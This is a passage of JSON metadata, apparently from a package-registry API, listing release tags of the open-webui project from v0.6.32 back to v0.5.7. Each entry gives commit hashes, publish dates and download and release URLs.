pendencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32/manifests"},{"name":"v0.6.31","sha":"598282cf75de358215d045c617e70d28bc48929e","kind":"commit","published_at":"2025-09-25T20:28:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31/manifests"},{"name":"v0.6.30","sha":"8920bf23774edd829e54e65b043864afb97bf2cf","kind":"commit","published_at":"2025-09-17T17:25:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30/manifests"},{"name":"v0.6.29","sha":"dddd1e44f37e0b489d10abbc21667e16d62722f6","kind":"commit","published_at":"2025-09-17T16:32:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29/manifests"},{"name":"v0.6.28","sha":"171021cfa4276f63fd9fd7f31fa0c904fb13c24c","kind":"commit","published_at":"2025-09-10T10:53:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28/manifests"},{"name":"v0.6.27","sha":"918f507d8cdc652ae913b8596877a8a50b845114","kind":"commit","published_at":"2025-09-09T14:34:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27/manifests"},{"name":"v0.6.26","sha":"2407d9b905978d68619bdce4021e424046ec8df9","kind":"commit","published_at":"2025-08-28T10:40:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26/manifests"},{"name":"v0.6.25","sha":"1db8dec4f52fc0fa8f8f7bfbb8ea5bde41fee17d","kind":"commit","published_at":"2025-08-22T13:22:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25/manifests"},{"name":"v0.6.24","sha":"2777bab1485aad097aa41c44a76f49be141eb061","kind":"commit","published_at":"2025-08-22T10:06:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24/manifests"},{"name":"v0.6.23","sha":"407dc9a401fc2382df06d776dbd8ba95dffda38a","kind":"commit","published_at":"2025-08-21T18:21:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23/manifests"},{"name":"v0.6.22","sha":"438e5d966f0f64f9ea3feab22724a5bd96a4127b","kind":"commit","published_at":"2025-08-11T13:15:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22/manifests"},{"name":"v0.6.21","sha":"30d0f8b1f6cc45ac3ee7e05ccb5c849366680231","kind":"commit","published_at":"2025-08-10T13:39:57.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21/manifests"},{"name":"v0.6.20","sha":"3f35ba27fc31500e2b1085f067371541becd5165","kind":"commit","published_at":"2025-08-09T22:59:14.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20/manifests"},{"name":"v0.6.19","sha":"2c3655a9694fc3f9a428e5521f42a187901d8dc0","kind":"commit","published_at":"2025-08-09T22:38:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19/manifests"},{"name":"v0.6.18","sha":"5fbfe2bdcadf5f157926f6551891e4dc0802b9f3","kind":"commit","published_at":"2025-07-19T19:26:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18/manifests"},{"name":"v0.6.17","sha":"b249809d2dff7bc89394a61ee5f7e258b295623a","kind":"commit","published_at":"2025-07-19T17:39:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17/manifests"},{"name":"v0.6.16","sha":"f966935d1da56a1f9f8691c1f62d68eecc0438fa","kind":"commit","published_at":"2025-07-14T17:39:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16/manifests"},{"name":"v0.6.15","sha":"b5f4c85bb196c16a775802907aedd87366f58b0f","kind":"commit","published_at":"2025-06-16T14:34:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15/manifests"},{"name":"v0.6.14","sha":"63256136ef8322210c01c2bb322097d1ccfb8c6f","kind":"commit","published_at":"2025-06-10T14:17:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14/manifests"},{"name":"v0.6.13","sha":"53764fe64884da147359e54ed6d9607fe57f1600","kind":"commit","published_at":"2025-05-29T21:37:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13/manifests"},{"name":"v0.6.12","sha":"ba0088f39b7a093920b142a5172554686f24df60","kind":"commit","published_at":"2025-05-28T23:59:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12/manifests"},{"name":"v0.6.11","sha":"9faa4c6a4cd8dd643cddb93dccb65c6609488a29","kind":"commit","published_at":"2025-05-26T22:27:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11/manifests"},{"name":"v0.6.10","sha":"e6afa69f59295d2930ff57285d0933e207d8e4c3","kind":"commit","published_at":"2025-05-19T01:34:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10/manifests"},{"name":"v0.6.9","sha":"0cef844168e97b70de2abee4c076cc30ffec6193","kind":"commit","published_at":"2025-05-10T19:04:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"ef301aa16b84f9cbc0ece18539f9db80bff0f605","kind":"commit","published_at":"2025-05-10T15:31:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"a3bb7df61058e690a76cebb7681bd5390e77d226","kind":"commit","published_at":"2025-05-06T23:08:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"23b9354cf6575bfe82e67df0660128d5a92461fc","kind":"commit","published_at":"2025-05-05T13:58:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"07d8460126a686de9a99e2662d06106e22c3f6b6","kind":"commit","published_at":"2025-04-14T09:13:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5/manifests"},{"name":"v0.6.4","sha":"aca37f592d0dedea2529fcb4304e4ff39e0c1219","kind":"commit","published_at":"2025-04-13T06:01:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4/manifests"},{"name":"v0.6.3","sha":"8b0e565e2c8a8f47f54ef039eb132ddb756e83a6","kind":"commit","published_at":"2025-04-13T05:44:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3/manifests"},{"name":"v0.6.2","sha":"63533c9e3ab41edd7bd4124ef94f6b6dc09aa175","kind":"commit","published_at":"2025-04-07T03:41:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2/manifests"},{"name":"v0.6.1","sha":"da948351658602fb7870b3e8573ad2b6f1ace09e","kind":"commit","published_at":"2025-04-05T17:15:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1/manifests"},{"name":"v0.6.0","sha":"04799f1f95f958674d35ba4854ef62754a4d332e","kind":"commit","published_at":"2025-04-01T01:47:18.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0/manifests"},{"name":"v0.5.20","sha":"3b70cd64d7fa6902e8c79cf8dcbf3c7e84cf704b","kind":"commit","published_at":"2025-03-06T03:44:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20/manifests"},{"name":"v0.5.19","sha":"1a51584fe02ba917e229f52367363ff783babd22","kind":"commit","published_at":"2025-03-05T06:22:20.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19/manifests"},{"name":"v0.5.18","sha":"95cadaca72e676199caf894f40cc132d7c8416df","kind":"commit","published_at":"2025-02-27T20:00:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18/manifests"},{"name":"v0.5.17","sha":"15485e7c5d2c09857acce10e311707e2bb8e86c9","kind":"commit","published_at":"2025-02-27T11:46:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17/manifests"},{"name":"v0.5.16","sha":"6fedd72e3973e1d13c9daf540350cd822826bf27","kind":"commit","published_at":"2025-02-20T19:26:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16/manifests"},{"name":"v0.5.15","sha":"9fdf2cd16c38d1711616925e852f17cac865d5fe","kind":"commit","published_at":"2025-02-20T10:01:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15/manifests"},{"name":"v0.5.14","sha":"3f3a5bb0ab8ce3425f317f1e57b084523aa2b2a5","kind":"commit","published_at":"2025-02-18T05:48:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14/manifests"},{"name":"v0.5.13","sha":"e4c9734fcba5105c30de874fd4c21c602dbd08a6","kind":"commit","published_at":"2025-02-18T04:36:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13/manifests"},{"name":"v0.5.12","sha":"2017856791b666fac5f1c2f80a3bc7916439438b","kind":"commit","published_at":"2025-02-14T07:12:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12/manifests"},{"name":"v0.5.11","sha":"4d667e447d0ae09e7723b979a699d0e85806552b","kind":"commit","published_at":"2025-02-13T10:06:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11/manifests"},{"name":"v0.5.10","sha":"e9d6ada25cd6ce84be067ba794af4c9d7116edc7","kind":"commit","published_at":"2025-02-05T22:46:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.10/manifests"},{"name":"v0.5.9","sha":"ab94468ffa765c9ed169cff3a7caa18e85f434db","kind":"commit","published_at":"2025-02-05T10:38:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9/manifests"},{"name":"v0.5.8","sha":"dc3b2f1f1e60dadfe6ca22e208b0f00d36f6a0f1","kind":"commit","published_at":"2025-02-05T09:16:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8/manifests"},{"name":"v0.5.7","sha":"b72150c881955721a63ae7f4ea1b9ea293816fc1","kind":"commit","published_at":"2025-01-23T21:47:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.7","dependen